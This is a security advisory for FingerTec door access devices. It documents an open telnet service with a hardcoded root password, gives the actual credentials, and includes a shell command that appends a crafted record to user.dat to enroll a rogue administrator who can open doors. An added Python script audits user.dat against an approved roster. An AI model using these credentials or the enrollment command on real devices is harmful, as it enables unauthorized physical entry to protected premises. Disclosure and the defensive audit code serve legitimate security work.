Hardcoded Default Root Password and Remote Enrollment
Vendor: Access Control Devices
By: Daniel Lawson
CVSS: 8.8 (HIGH)
CWE: 798
Product Name: Access Control Devices
Patch Exists: No
Year: 2016

Default Root Password and Remote Enrollment on FingerTec Devices

Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door.

Mitigation:

Disable telnet access and change the default root password.

Exploit-DB raw data:

# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
# Date: 12-01-2016 
# Exploit Author: Daniel Lawson 
# Contact: http://twitter.com/fang0654 
# Website: https://digital-panther.com 
# Category: physical access control 

1. Description 

Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. 

2. Proof of Concept 

Log in to telnet with the credentials: root / founder88 
At the console type in the command: 
echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
--- 

Daniel Lawson 
Digital Panther Security 
https://digital-panther.com
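
An added example, not part of the original advisory or of any vendor tooling: a roster audit for a copy of user.dat pulled from a device, reporting records that are not on an approved list or whose privilege byte has changed. The 28-byte record layout is an assumption inferred from the byte string in the proof of concept, and the sample records and roster are constructed.

```python
import struct

# ASSUMED layout, inferred from the 28-byte string in the advisory (not vendor
# documentation): u16 id, u8 privilege, 5-byte PIN, 8-byte name, 5-byte card,
# u8 group, u16 time zones, u32 copy of the id. All integers little-endian.
RECORD = struct.Struct("<HB5s8s5sBHI")

def parse_users(blob):
    """Return (users, leftover_byte_count). PIN and card values are not kept."""
    usable = len(blob) - len(blob) % RECORD.size
    users = []
    for uid, priv, _pin, name, _card, _grp, _tz, uid32 in RECORD.iter_unpack(blob[:usable]):
        label = name.split(b"\0", 1)[0].decode("ascii", "replace")
        users.append({"id": uid, "id32": uid32, "privilege": priv, "name": label})
    return users, len(blob) - usable

def audit(blob, approved):
    """Compare user.dat with `approved` (id -> expected privilege byte)."""
    users, leftover = parse_users(blob)
    findings = []
    if leftover:
        findings.append(f"{leftover} trailing bytes: truncated or malformed record")
    seen = set()
    for u in users:
        who = f"id {u['id']} ({u['name']!r})"
        if u["id"] != u["id32"]:
            findings.append(f"{who}: 16-bit and 32-bit id fields disagree")
        if u["id"] in seen:
            findings.append(f"{who}: duplicate id")
        seen.add(u["id"])
        if u["id"] not in approved:
            findings.append(f"{who}: not on approved roster, privilege {u['privilege']:#04x}")
        elif u["privilege"] != approved[u["id"]]:
            findings.append(f"{who}: privilege {u['privilege']:#04x}, expected {approved[u['id']]:#04x}")
    return findings

# Constructed sample: two enrolled users plus one record appended out of band.
SAMPLE = bytes.fromhex(
    "0100" "00" "0000000000" "616c696365000000" "0000000000" "01" "0000" "01000000"
    "0300" "06" "0000000000" "626f620000000000" "0000000000" "01" "0000" "03000000"
    "0200" "06" "0000000000" "6d616c6c6f727900" "0000000000" "01" "0000" "02000000"
)
APPROVED = {1: 0x00, 3: 0x06}  # constructed roster: id -> privilege byte

if __name__ == "__main__":
    for line in audit(SAMPLE, APPROVED):
        print(line)
```

Run it against a file copy rather than on the device, and keep the approved roster somewhere the device cannot write to.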